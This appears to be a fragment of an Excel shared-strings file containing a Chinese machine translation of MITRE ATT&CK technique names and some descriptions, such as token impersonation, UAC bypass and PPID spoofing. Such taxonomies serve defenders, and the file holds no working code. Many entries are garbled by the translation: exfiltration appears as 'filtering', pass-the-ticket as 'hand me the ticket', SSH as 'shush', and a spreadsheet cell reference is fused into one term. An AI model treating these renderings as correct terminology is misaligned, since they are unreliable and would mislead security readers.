    <t>通过未加密/模糊的非C2协议进行过滤</t>
  </si>
  <si>
    <t>C2通道渗出</t>
  </si>
  <si>
    <t>通过其他网络介质进行过滤</t>
  </si>
  <si>
    <t>蓝牙过滤</t>
  </si>
  <si>
    <t>物理介质上的渗出</t>
  </si>
  <si>
    <t>通过USB进行过滤</t>
  </si>
  <si>
    <t>基于Web服务的过滤</t>
  </si>
  <si>
    <t>代码库的过滤</t>
  </si>
  <si>
    <t>渗出到云存储</t>
  </si>
  <si>
    <t>利用面向公众的应用程序</t>
  </si>
  <si>
    <t>利用漏洞进行客户端执行</t>
  </si>
  <si>
    <t>对凭据访问的攻击</t>
  </si>
  <si>
    <t>利用漏洞逃避防卫</t>
  </si>
  <si>
    <t>利用漏洞升级权限</t>
  </si>
  <si>
    <t>利用远程服务</t>
  </si>
  <si>
    <t>外部远程服务</t>
  </si>
  <si>
    <t>后备通道</t>
  </si>
  <si>
    <t>文件和目录发现</t>
  </si>
  <si>
    <t>文件和目录权限修改</t>
  </si>
  <si>
    <t>Windows文件和目录权限修改</t>
  </si>
  <si>
    <t>Linux和Mac文件和目录权限修改</t>
  </si>
  <si>
    <t>固件损坏</t>
  </si>
  <si>
    <t>强制认证</t>
  </si>
  <si>
    <t>伪造网络凭证</t>
  </si>
  <si>
    <t>网络Cookies</t>
  </si>
  <si>
    <t>SAML代币</t>
  </si>
  <si>
    <t>收集受害者主机信息</t>
  </si>
  <si>
    <t>硬件</t>
  </si>
  <si>
    <t>客户端配置</t>
  </si>
  <si>
    <t>收集受害者身份信息</t>
  </si>
  <si>
    <t>资格证书</t>
  </si>
  <si>
    <t>电子邮件地址</t>
  </si>
  <si>
    <t>员工姓名</t>
  </si>
  <si>
    <t>收集受害者网络信息</t>
  </si>
  <si>
    <t>域属性</t>
  </si>
  <si>
    <t>网络信任依赖关系</t>
  </si>
  <si>
    <t>网络拓扑</t>
  </si>
  <si>
    <t>IP地址</t>
  </si>
  <si>
    <t>网络安全设备</t>
  </si>
  <si>
    <t>收集受害者组织信息</t>
  </si>
  <si>
    <t>确定实际位置</t>
  </si>
  <si>
    <t>业务关系</t>
  </si>
  <si>
    <t>确定业务节奏</t>
  </si>
  <si>
    <t>确定角色</t>
  </si>
  <si>
    <t>组策略发现</t>
  </si>
  <si>
    <t>硬件添加</t>
  </si>
  <si>
    <t>隐藏文物</t>
  </si>
  <si>
    <t>隐藏的文件和目录</t>
  </si>
  <si>
    <t>隐藏用户</t>
  </si>
  <si>
    <t>隐藏窗口</t>
  </si>
  <si>
    <t>NTFS文件属性</t>
  </si>
  <si>
    <t>隐藏文件系统</t>
  </si>
  <si>
    <t>运行虚拟实例</t>
  </si>
  <si>
    <t>VBA跺脚</t>
  </si>
  <si>
    <t>电子邮件隐藏规则</t>
  </si>
  <si>
    <t>资源分叉</t>
  </si>
  <si>
    <t>劫持执行流程</t>
  </si>
  <si>
    <t>DLL搜索命令劫持</t>
  </si>
  <si>
    <t>DLL侧加载</t>
  </si>
  <si>
    <t>动态劫持</t>
  </si>
  <si>
    <t>可执行安装程序文件权限漏洞</t>
  </si>
  <si>
    <t>动态链接器劫持</t>
  </si>
  <si>
    <t>路径环境变量的路径拦截</t>
  </si>
  <si>
    <t>通过搜索命令劫持进行路径拦截</t>
  </si>
  <si>
    <t>通过无引号路径拦截路径</t>
  </si>
  <si>
    <t>服务文件权限弱点</t>
  </si>
  <si>
    <t>服务注册表权限弱点</t>
  </si>
  <si>
    <t>COR_剖面仪</t>
  </si>
  <si>
    <t>削弱防御能力</t>
  </si>
  <si>
    <t>禁用或修改工具</t>
  </si>
  <si>
    <t>禁用Windows事件日志记录</t>
  </si>
  <si>
    <t>破坏命令历史记录</t>
  </si>
  <si>
    <t>禁用或修改系统防火墙</t>
  </si>
  <si>
    <t>指示器阻塞</t>
  </si>
  <si>
    <t>禁用或修改云防火墙</t>
  </si>
  <si>
    <t>禁用云日志</t>
  </si>
  <si>
    <t>安全模式启动</t>
  </si>
  <si>
    <t>降级攻击</t>
  </si>
  <si>
    <t>植入物内部图像</t>
  </si>
  <si>
    <t>删除主机上的指示器</t>
  </si>
  <si>
    <t>清除Windows事件日志</t>
  </si>
  <si>
    <t>清除Linux或Mac系统日志</t>
  </si>
  <si>
    <t>清除命令历史记录</t>
  </si>
  <si>
    <t>删除网络共享连接</t>
  </si>
  <si>
    <t>时隙</t>
  </si>
  <si>
    <t>间接命令执行</t>
  </si>
  <si>
    <t>抑制系统恢复</t>
  </si>
  <si>
    <t>输入捕获</t>
  </si>
  <si>
    <t>键盘记录</t>
  </si>
  <si>
    <t>GUI输入捕获</t>
  </si>
  <si>
    <t>门户网站捕获</t>
  </si>
  <si>
    <t>凭证API挂钩</t>
  </si>
  <si>
    <t>进程间通信</t>
  </si>
  <si>
    <t>组件对象模型</t>
  </si>
  <si>
    <t>动态数据交换</t>
  </si>
  <si>
    <t>内部网络钓鱼</t>
  </si>
  <si>
    <t>伪装</t>
  </si>
  <si>
    <t>无效的代码签名</t>
  </si>
  <si>
    <t>重命名系统实用程序</t>
  </si>
  <si>
    <t>伪装任务或服务</t>
  </si>
  <si>
    <t>匹配合法的名称或位置</t>
  </si>
  <si>
    <t>文件名后的空格</t>
  </si>
  <si>
    <t>双文件扩展名</t>
  </si>
  <si>
    <t>修改身份验证过程</t>
  </si>
  <si>
    <t>域控制器身份验证</t>
  </si>
  <si>
    <t>密码过滤器DLL</t>
  </si>
  <si>
    <t>验证模块</t>
  </si>
  <si>
    <t>网络设备认证</t>
  </si>
  <si>
    <t>修改云计算基础设施</t>
  </si>
  <si>
    <t>创建快照</t>
  </si>
  <si>
    <t>创建云实例</t>
  </si>
  <si>
    <t>删除云实例</t>
  </si>
  <si>
    <t>还原云实例</t>
  </si>
  <si>
    <t>修改注册表</t>
  </si>
  <si>
    <t>修改系统映像</t>
  </si>
  <si>
    <t>补丁系统映像</t>
  </si>
  <si>
    <t>降级系统映像</t>
  </si>
  <si>
    <t>多级通道</t>
  </si>
  <si>
    <t>本机API</t>
  </si>
  <si>
    <t>网络边界桥接</t>
  </si>
  <si>
    <t>网络地址转换遍历</t>
  </si>
  <si>
    <t>网络拒绝服务</t>
  </si>
  <si>
    <t>直接网络洪水</t>
  </si>
  <si>
    <t>反射放大</t>
  </si>
  <si>
    <t>网络服务扫描</t>
  </si>
  <si>
    <t>网络共享发现</t>
  </si>
  <si>
    <t>网络嗅探</t>
  </si>
  <si>
    <t>非应用层协议</t>
  </si>
  <si>
    <t>非标准端口</t>
  </si>
  <si>
    <t>模糊的文件或信息</t>
  </si>
  <si>
    <t>二进制填充</t>
  </si>
  <si>
    <t>软件打包</t>
  </si>
  <si>
    <t>交付后编译</t>
  </si>
  <si>
    <t>从工具中移除指示器</t>
  </si>
  <si>
    <t>HTML走私</t>
  </si>
  <si>
    <t>获得能力</t>
  </si>
  <si>
    <t>工具</t>
  </si>
  <si>
    <t>弱点</t>
  </si>
  <si>
    <t>Office应用程序启动</t>
  </si>
  <si>
    <t>Office模板宏</t>
  </si>
  <si>
    <t>Outlook表单</t>
  </si>
  <si>
    <t>Outlook主页</t>
  </si>
  <si>
    <t>Outlook规则</t>
  </si>
  <si>
    <t>加载项</t>
  </si>
  <si>
    <t>操作系统凭据转储</t>
  </si>
  <si>
    <t>LSASS存储器</t>
  </si>
  <si>
    <t>安全帐户经理</t>
  </si>
  <si>
    <t>NTD</t>
  </si>
  <si>
    <t>LSA密码</t>
  </si>
  <si>
    <t>缓存的域凭据</t>
  </si>
  <si>
    <t>进程文件系统</t>
  </si>
  <si>
    <t>/etc/passwd和/etc/shadow</t>
  </si>
  <si>
    <t>密码策略发现</t>
  </si>
  <si>
    <t>外围设备发现</t>
  </si>
  <si>
    <t>权限组发现</t>
  </si>
  <si>
    <t>地方团体</t>
  </si>
  <si>
    <t>域组</t>
  </si>
  <si>
    <t>网络钓鱼附件</t>
  </si>
  <si>
    <t>网络钓鱼链接</t>
  </si>
  <si>
    <t>通过网络钓鱼服务</t>
  </si>
  <si>
    <t>网络钓鱼获取信息</t>
  </si>
  <si>
    <t>网络钓鱼服务</t>
  </si>
  <si>
    <t>操作系统启动前</t>
  </si>
  <si>
    <t>系统固件</t>
  </si>
  <si>
    <t>组件固件</t>
  </si>
  <si>
    <t>TFTP引导</t>
  </si>
  <si>
    <t>过程发现</t>
  </si>
  <si>
    <t>过程注入</t>
  </si>
  <si>
    <t>动态链接库注入</t>
  </si>
  <si>
    <t>便携式可执行注入</t>
  </si>
  <si>
    <t>线程执行劫持</t>
  </si>
  <si>
    <t>异步过程调用</t>
  </si>
  <si>
    <t>线程本地存储</t>
  </si>
  <si>
    <t>Ptrace系统调用</t>
  </si>
  <si>
    <t>进程存储器</t>
  </si>
  <si>
    <t>额外窗口内存注入</t>
  </si>
  <si>
    <t>VDSO劫持</t>
  </si>
  <si>
    <t>协议隧道</t>
  </si>
  <si>
    <t>代理</t>
  </si>
  <si>
    <t>内部代理</t>
  </si>
  <si>
    <t>外部代理</t>
  </si>
  <si>
    <t>多跳代理</t>
  </si>
  <si>
    <t>领域前沿</t>
  </si>
  <si>
    <t>查询注册表</t>
  </si>
  <si>
    <t>反射式代码加载</t>
  </si>
  <si>
    <t>远程访问软件</t>
  </si>
  <si>
    <t>远程服务会话劫持</t>
  </si>
  <si>
    <t>SSH劫持</t>
  </si>
  <si>
    <t>RDP劫持</t>
  </si>
  <si>
    <t>远程服务</t>
  </si>
  <si>
    <t>远程桌面协议</t>
  </si>
  <si>
    <t>SMB/Windows管理员共享</t>
  </si>
  <si>
    <t>分布式组件对象模型</t>
  </si>
  <si>
    <t>嘘</t>
  </si>
  <si>
    <t>Windows远程管理</t>
  </si>
  <si>
    <t>远程系统发现</t>
  </si>
  <si>
    <t>通过可移动媒体进行复制</t>
  </si>
  <si>
    <t>资源劫持</t>
  </si>
  <si>
    <t>流氓域控制器</t>
  </si>
  <si>
    <t>计划任务/作业</t>
  </si>
  <si>
    <t>At（Linux）</t>
  </si>
  <si>
    <t>计划任务</t>
  </si>
  <si>
    <t>系统计时器</t>
  </si>
  <si>
    <t>容器编排作业</t>
  </si>
  <si>
    <t>定时转移</t>
  </si>
  <si>
    <t>屏幕截图</t>
  </si>
  <si>
    <t>搜索封闭来源</t>
  </si>
  <si>
    <t>威胁英特尔供应商</t>
  </si>
  <si>
    <t>购买技术资料</t>
  </si>
  <si>
    <t>搜索开放的技术数据库</t>
  </si>
  <si>
    <t>DNS/被动DNS</t>
  </si>
  <si>
    <t>CDN</t>
  </si>
  <si>
    <t>扫描数据库</t>
  </si>
  <si>
    <t>搜索打开的网站/域</t>
  </si>
  <si>
    <t>搜索引擎</t>
  </si>
  <si>
    <t>搜索受害者拥有的网站</t>
  </si>
  <si>
    <t>服务器软件组件</t>
  </si>
  <si>
    <t>SQL存储过程</t>
  </si>
  <si>
    <t>运输代理人</t>
  </si>
  <si>
    <t>网壳</t>
  </si>
  <si>
    <t>IIS组件</t>
  </si>
  <si>
    <t>服务站</t>
  </si>
  <si>
    <t>共享模块</t>
  </si>
  <si>
    <t>签名二进制代理执行</t>
  </si>
  <si>
    <t>编译的HTML文件</t>
  </si>
  <si>
    <t>控制面板</t>
  </si>
  <si>
    <t>Rundl32</t>
  </si>
  <si>
    <t>签名脚本代理执行</t>
  </si>
  <si>
    <t>PubPrn公司</t>
  </si>
  <si>
    <t>软件部署工具</t>
  </si>
  <si>
    <t>软件发现</t>
  </si>
  <si>
    <t>安全软件发现</t>
  </si>
  <si>
    <t>上传恶意软件</t>
  </si>
  <si>
    <t>上传工具</t>
  </si>
  <si>
    <t>安装数字证书</t>
  </si>
  <si>
    <t>路过目标</t>
  </si>
  <si>
    <t>链接目标</t>
  </si>
  <si>
    <t>窃取应用程序访问令牌</t>
  </si>
  <si>
    <t>偷或伪造门票</t>
  </si>
  <si>
    <t>窃取Web会话Cookie</t>
  </si>
  <si>
    <t>颠覆信任控制</t>
  </si>
  <si>
    <t>WHOIS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>阶段能力</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网关绕过</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>制作并模拟令牌</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LSASS驱动</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>暴力破解</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>盗取账户</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网域</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>管理命令容器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>运行代理</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统服务</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>汇集</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>损坏</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>内部损坏</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>外部损坏</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>漏洞利用</t>
  </si>
  <si>
    <t>动态解析</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>占用应用资源</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>占用服务资源</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>占用系统资源</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>渗透主机</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>创建账户</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Acce+B201:B250可访问性功能</t>
  </si>
  <si>
    <t>入口工具转移</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>横向工具转移</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>从右向左越权</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Office测试</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>云组</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络钓鱼</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>双通道进程</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>进程镂空</t>
  </si>
  <si>
    <t>At (Windows)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>克隆</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>代码签名</t>
  </si>
  <si>
    <t>SIP和信任提供商劫持</t>
  </si>
  <si>
    <t>安装根证书</t>
  </si>
  <si>
    <t>网络绕过的标志</t>
  </si>
  <si>
    <t>代码签名策略修改</t>
  </si>
  <si>
    <t>供应链妥协</t>
  </si>
  <si>
    <t>破坏软件依赖性和开发工具</t>
  </si>
  <si>
    <t>妥协软件供应链</t>
  </si>
  <si>
    <t>妥协硬件供应链</t>
  </si>
  <si>
    <t>系统信息发现</t>
  </si>
  <si>
    <t>系统位置发现</t>
  </si>
  <si>
    <t>系统语言发现</t>
  </si>
  <si>
    <t>系统网络配置发现</t>
  </si>
  <si>
    <t>Internet连接发现</t>
  </si>
  <si>
    <t>系统网络连接发现</t>
  </si>
  <si>
    <t>系统所有者/用户发现</t>
  </si>
  <si>
    <t>系统服务发现</t>
  </si>
  <si>
    <t>启动CTL</t>
  </si>
  <si>
    <t>服务执行</t>
  </si>
  <si>
    <t>系统关闭/重新启动</t>
  </si>
  <si>
    <t>系统时间发现</t>
  </si>
  <si>
    <t>将数据传输到云帐户</t>
  </si>
  <si>
    <t>可信开发工具代理执行</t>
  </si>
  <si>
    <t>信任关系</t>
  </si>
  <si>
    <t>双因素身份验证拦截</t>
  </si>
  <si>
    <t>无安全凭据</t>
  </si>
  <si>
    <t>文件中的凭据</t>
  </si>
  <si>
    <t>注册表中的凭据</t>
  </si>
  <si>
    <t>Bash历史</t>
  </si>
  <si>
    <t>私钥</t>
  </si>
  <si>
    <t>云实例元数据API</t>
  </si>
  <si>
    <t>组策略首选项</t>
  </si>
  <si>
    <t>容器API</t>
  </si>
  <si>
    <t>未使用/不支持的云区域</t>
  </si>
  <si>
    <t>使用替代认证材料</t>
  </si>
  <si>
    <t>应用程序访问令牌</t>
  </si>
  <si>
    <t>传递散列</t>
  </si>
  <si>
    <t>把票递给我</t>
  </si>
  <si>
    <t>Web会话Cookie</t>
  </si>
  <si>
    <t>用户执行</t>
  </si>
  <si>
    <t>恶意链接</t>
  </si>
  <si>
    <t>恶意文件</t>
  </si>
  <si>
    <t>恶意图像</t>
  </si>
  <si>
    <t>有效账户</t>
  </si>
  <si>
    <t>Taint Shared Content</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>模板注入</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>端口爆破</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>默认帐户</t>
  </si>
  <si>
    <t>当地账户</t>
  </si>
  <si>
    <t>视频捕获</t>
  </si>
  <si>
    <t>虚拟化/沙盒规避</t>
  </si>
  <si>
    <t>系统检查</t>
  </si>
  <si>
    <t>基于用户活动的检查</t>
  </si>
  <si>
    <t>基于时间的规避</t>
  </si>
  <si>
    <t>削弱加密</t>
  </si>
  <si>
    <t>减少密钥空间</t>
  </si>
  <si>
    <t>禁用加密硬件</t>
  </si>
  <si>
    <t>死点分解器</t>
  </si>
  <si>
    <t>双向通信阶段</t>
  </si>
  <si>
    <t>单向沟通</t>
  </si>
  <si>
    <t>Windows管理工具</t>
  </si>
  <si>
    <t>XSL脚本处理</t>
  </si>
  <si>
    <t>访问日历条目</t>
  </si>
  <si>
    <t>访问呼叫日志</t>
  </si>
  <si>
    <t>访问联系人列表</t>
  </si>
  <si>
    <t>访问通知</t>
  </si>
  <si>
    <t>访问设备日志中的敏感数据</t>
  </si>
  <si>
    <t>访问存储的应用程序数据</t>
  </si>
  <si>
    <t>替代网络媒介</t>
  </si>
  <si>
    <t>应用程序发现</t>
  </si>
  <si>
    <t>通过USB连接攻击PC</t>
  </si>
  <si>
    <t>广播接收机</t>
  </si>
  <si>
    <t>呼叫控制</t>
  </si>
  <si>
    <t>捕获音频</t>
  </si>
  <si>
    <t>摄像机</t>
  </si>
  <si>
    <t>捕获剪贴板数据</t>
  </si>
  <si>
    <t>捕获短信</t>
  </si>
  <si>
    <t>运营商账单欺诈</t>
  </si>
  <si>
    <t>剪贴板修改</t>
  </si>
  <si>
    <t>代码注入</t>
  </si>
  <si>
    <t>命令行界面</t>
  </si>
  <si>
    <t>常用端口</t>
  </si>
  <si>
    <t>泄露应用程序可执行文件</t>
  </si>
  <si>
    <t>数据加密</t>
  </si>
  <si>
    <t>删除设备数据</t>
  </si>
  <si>
    <t>通过授权应用商店交付恶意应用</t>
  </si>
  <si>
    <t>通过其他方式交付恶意应用</t>
  </si>
  <si>
    <t>设备管理员权限</t>
  </si>
  <si>
    <t>设备锁定</t>
  </si>
  <si>
    <t>伪装根/越狱指示器</t>
  </si>
  <si>
    <t>降级到不安全的协议</t>
  </si>
  <si>
    <t>在运行时下载新代码</t>
  </si>
  <si>
    <t>不安全网络通信中的窃听</t>
  </si>
  <si>
    <t>规避分析环境</t>
  </si>
  <si>
    <t>开发企业资源</t>
  </si>
  <si>
    <t>利用操作系统漏洞</t>
  </si>
  <si>
    <t>利用SS7重定向电话/短信</t>
  </si>
  <si>
    <t>利用SS7跟踪设备位置</t>
  </si>
  <si>
    <t>利用TEE漏洞</t>
  </si>
  <si>
    <t>通过充电站或PC进行攻击</t>
  </si>
  <si>
    <t>通过无线电接口进行攻击</t>
  </si>
  <si>
    <t>前景持久性</t>
  </si>
  <si>
    <t>产生虚假广告收入</t>
  </si>
  <si>
    <t>输入注入</t>
  </si>
  <si>
    <t>输入提示</t>
  </si>
  <si>
    <t>安装不安全或恶意的配置</t>
  </si>
  <si>
    <t>干扰或拒绝服务</t>
  </si>
  <si>
    <t>位置跟踪</t>
  </si>
  <si>
    <t>锁屏旁路</t>
  </si>
  <si>
    <t>操纵应用商店排名或评级</t>
  </si>
  <si>
    <t>操纵设备通信</t>
  </si>
  <si>
    <t>伪装成合法申请</t>
  </si>
  <si>
    <t>修改缓存的可执行代码</t>
  </si>
  <si>
    <t>修改操作系统内核或引导分区</t>
  </si>
  <si>
    <t>修改系统分区</t>
  </si>
  <si>
    <t>修改可信执行环境</t>
  </si>
  <si>
    <t>本机代码</t>
  </si>
  <si>
    <t>网络信息发现</t>
  </si>
  <si>
    <t>网络流量捕获或重定向</t>
  </si>
  <si>
    <t>获取设备云备份</t>
  </si>
  <si>
    <t>通过受害者代理</t>
  </si>
  <si>
    <t>远程文件拷贝</t>
  </si>
  <si>
    <t>未经授权远程跟踪设备</t>
  </si>
  <si>
    <t>未经授权远程擦除数据</t>
  </si>
  <si>
    <t>恶意蜂窝基站</t>
  </si>
  <si>
    <t>恶意Wi-Fi接入点</t>
  </si>
  <si>
    <t>SIM卡交换</t>
  </si>
  <si>
    <t>短信控制</t>
  </si>
  <si>
    <t>标准应用层协议</t>
  </si>
  <si>
    <t>标准密码协议</t>
  </si>
  <si>
    <t>抑制应用程序图标</t>
  </si>
  <si>
    <t>不常用的端口</t>
  </si>
  <si>
    <t>卸载恶意应用程序</t>
  </si>
  <si>
    <t>URI劫持</t>
  </si>
  <si>
    <t>用户规避</t>
  </si>
  <si>
    <t>敌人可能会收集有关受害者组织的信息，以便在瞄准过程中使用。有关组织的信息可能包括各种细节，包括部门名称、业务运营细节以及关键员工的角色和职责。</t>
  </si>
  <si>
    <t>敌人可能会收集受害者的物理位置，以便在瞄准过程中使用。有关目标组织的物理位置的信息可能包括各种细节，包括关键资源和基础设施所在的位置。实际位置也可能表明被害人在什么样的法律管辖权和/或当局内活动。</t>
  </si>
  <si>
    <t>由于使用不准确，这种技术已被弃用。引用的报告没有提供恶意软件如何直接与launchd交互，而不是通过已知服务的技术细节。其他系统服务用于与launchd交互，而不是launchd自己使用。</t>
  </si>
  <si>
    <t>恶意应用程序可以读取操作系统或其他应用程序发送的通知，这些应用程序可能包含敏感数据，例如通过SMS、电子邮件或其他媒介发送的一次性身份验证码。恶意应用程序还可以关闭通知，以防止用户注意到通知已到达，并可以触发通知中包含的操作按钮。</t>
  </si>
  <si>
    <t>意图是在Android应用程序或系统组件之间传递的消息。应用程序可以注册以在运行时接收广播意图，这是当设备上发生某些事件（如网络更改或用户解锁屏幕）时，向每个应用程序发送的系统范围的意图。然后，恶意应用程序可以根据接收到的广播意图在应用程序内触发某些操作。</t>
  </si>
  <si>
    <t>恶意应用程序可能会捕获通过SMS发送的敏感数据，包括身份验证凭据。SMS经常用于传输用于多因素身份验证的代码。</t>
  </si>
  <si>
    <t>恶意应用可能会以几种不同的方式对受害者的运营商账单发起欺诈性指控，包括短信收费欺诈和进行购买的短信短码。</t>
  </si>
  <si>
    <t>数据在被过滤之前会被加密，以隐藏被过滤的信息，使其不被检测到，或者在防守者检查时使过滤不那么明显。加密由实用程序、编程库或自定义算法对数据本身执行，并被视为与命令和控制或文件传输协议执行的任何加密分开。可以加密文件的常见文件格式是RAR和zip。</t>
  </si>
  <si>
    <t>敏感数据可以从本地系统源收集，例如文件系统或驻留在系统上的信息数据库。</t>
  </si>
  <si>
    <t>安装后，应用程序可以下载并执行动态代码（不包括在原始应用程序包中），以避开用于应用程序审查或应用程序商店审查的静态分析技术（以及潜在的动态分析技术）。</t>
  </si>
  <si>
    <t>恶意应用可以利用操作系统中未修补的漏洞获取升级权限。</t>
  </si>
  <si>
    <t>如果移动设备连接（通常通过USB）到充电站或PC，例如为设备的电池充电，则受损或恶意的充电站或PC可能会试图通过连接攻击移动设备。</t>
  </si>
  <si>
    <t>移动设备可通过其与蜂窝网络的接口或其他无线电接口被攻击。</t>
  </si>
  <si>
    <t>在Android上，可以使用命令行工具或Java文件API枚举文件系统内容。然而，Linux文件权限和SELinux策略通常会强烈限制应用程序可以访问的内容（而不利用权限提升漏洞）。外部存储目录的内容通常是可见的，如果敏感数据不适当地存储在那里，这可能会引起关注。</t>
  </si>
  <si>
    <t>恶意应用程序可以向用户界面注入输入，通过滥用Android的可访问性API来模拟用户交互。</t>
  </si>
  <si>
    <t>攻击者可能会干扰无线电信号（如Wi-Fi、蜂窝电话、GPS）以阻止移动设备通信。</t>
  </si>
  <si>
    <t>应用程序可能包含模糊或加密形式的恶意代码，然后在运行时对代码进行除臭或解密，以逃避许多应用程序审查技术。</t>
  </si>
  <si>
    <t>在5之前的Android版本上，应用程序可以观察通过ActivityManager类中的方法运行的其他进程的信息。在7之前的Android版本上，应用程序可以通过执行ps命令或检查/proc目录来获取这些信息。从Android版本7开始，使用Linux内核的hidepid功能可以防止应用程序（没有升级权限）访问这些信息。</t>
  </si>
  <si>
    <t>恶意应用程序可能会禁止在应用程序启动器中向用户显示其图标，以隐藏其已安装的事实，并使用户更难卸载该应用程序。以编程方式隐藏应用程序的图标不需要任何特殊权限。</t>
  </si>
  <si>
    <t>在Android上，应用程序可以通过java访问车载网络接口的详细信息。网NetworkInterface类。Android TelephonyManager类可用于收集相关信息，如IMSI、IMEI和电话号码。</t>
  </si>
  <si>
    <t>在Android上，应用程序可以使用标准API收集与设备之间的网络连接列表。例如，谷歌Play商店中提供的网络连接应用程序宣传了这一功能。</t>
  </si>
  <si>
    <t>恶意软件中可能包含从设备上卸载恶意应用程序的功能。这可以通过以下方式实现：</t>
  </si>
  <si>
    <t>攻击者可能会绕过旨在控制提升权限的机制来获得更高级别的权限。大多数现代系统包含本机高程控制机制，旨在限制用户可以在机器上执行的权限。必须向特定用户授予授权，才能执行风险更高的任务。攻击者可以执行几种方法来利用内置的控制机制，以提升系统上的权限。</t>
  </si>
  <si>
    <t>攻击者可以使用setuid或setgid位执行shell转义或利用应用程序中的漏洞，使代码在不同用户的上下文中运行。在Linux或macOS上，当为应用程序设置setuid或setgid位时，应用程序将分别以所属用户或组的权限运行。通常情况下，应用程序在当前用户的上下文中运行，而不管是哪个用户或组拥有该应用程序。然而，在某些情况下，程序需要在提升的上下文中执行才能正常运行，但运行它们的用户不需要提升的权限。</t>
  </si>
  <si>
    <t>攻击者可以绕过UAC机制来提升系统上的进程权限。Windows用户帐户控制（UAC）允许程序提升其权限（跟踪为从低到高的完整性级别），以在管理员级别权限下执行任务，可能是通过提示用户进行确认。对用户的影响范围从拒绝高强制下的操作到允许用户执行操作（如果他们在本地管理员组中）并单击提示或允许他们输入管理员密码以完成操作。</t>
  </si>
  <si>
    <t>攻击者可以执行sudo缓存和/或使用suoders文件提升权限。攻击者可以这样做，作为其他用户执行命令，或生成具有更高权限的进程。</t>
  </si>
  <si>
    <t>攻击者可以利用AuthorizationExecuteWithPrivileges API，通过提示用户提供凭据来升级权限。此API的目的是为应用程序开发人员提供一种使用root权限执行操作的简单方法，例如安装或更新应用程序。此API不验证请求根权限的程序是否来自可靠来源或是否已被恶意修改。</t>
  </si>
  <si>
    <t>攻击者可能会修改访问令牌，使其在不同的用户或系统安全上下文下运行，以执行操作并绕过访问控制。Windows使用访问令牌来确定正在运行的进程的所有权。用户可以操纵访问令牌，使正在运行的进程看起来像是另一个进程的子进程，或者属于启动该进程的用户以外的其他人。当发生这种情况时，进程还将采用与新令牌关联的安全上下文。</t>
  </si>
  <si>
    <t>攻击者可以复制然后模拟另一个用户的令牌来升级权限并绕过访问控制。攻击者可以使用DuplicateToken（Ex）创建新的访问令牌，以复制现有令牌。然后，该令牌可以与ImpersonateLoggedOnUser一起使用，以允许调用线程模拟已登录用户的安全上下文，或者与SetThreadToken一起将模拟的令牌分配给线程。</t>
  </si>
  <si>
    <t>攻击者可能会使用不同的令牌创建一个新流程，以升级权限并绕过访问控制。可以使用CreateProcessWithTokenW和runas等功能，使用另一个用户的令牌和生成的安全上下文创建进程。</t>
  </si>
  <si>
    <t>攻击者可以制作和模拟令牌来提升权限并绕过访问控制。如果攻击者拥有用户名和密码，但用户未登录系统，则攻击者可以使用LogonUser功能为用户创建登录会话。该函数将返回新会话的访问令牌的副本，攻击者可以使用SetThreadToken将该令牌分配给线程。</t>
  </si>
  <si>
    <t>攻击者可能会欺骗新进程的父进程标识符（PPID），以逃避进程监视防御或提升权限。除非明确指定，否则新进程通常直接从其父进程或调用进程派生。显式分配新流程的PPID的一种方法是通过CreateProcess API调用，该调用支持定义要使用的PPID的参数。在系统（通常通过svchost.exe或approve.exe）而不是当前用户上下文生成请求的提升进程后，用户帐户控制（UAC）等Windows功能将使用此功能来正确设置PPID。</t>
  </si>
  <si>
    <t>攻击者可以使用SID历史记录注入来升级权限并绕过访问控制。Windows安全标识符（SID）是标识用户或组帐户的唯一值。Windows security在安全描述符和访问令牌中都使用SID。帐户可以在SID History Active Directory属性中保存其他SID，从而允许在域之间进行可互操作的帐户迁移（例如，SID History中的所有值都包含在访问令牌中）。</t>
  </si>
  <si>
    <t>攻击者可以通过禁止访问合法用户使用的帐户来中断系统和网络资源的可用性。可以删除、锁定或操纵帐户（例如：更改凭据），以删除对帐户的访问。</t>
  </si>
  <si>
    <t>攻击者可能试图获取系统或环境中的帐户列表。这些信息可以帮助攻击者确定存在哪些账户来帮助后续行为。</t>
  </si>
  <si>
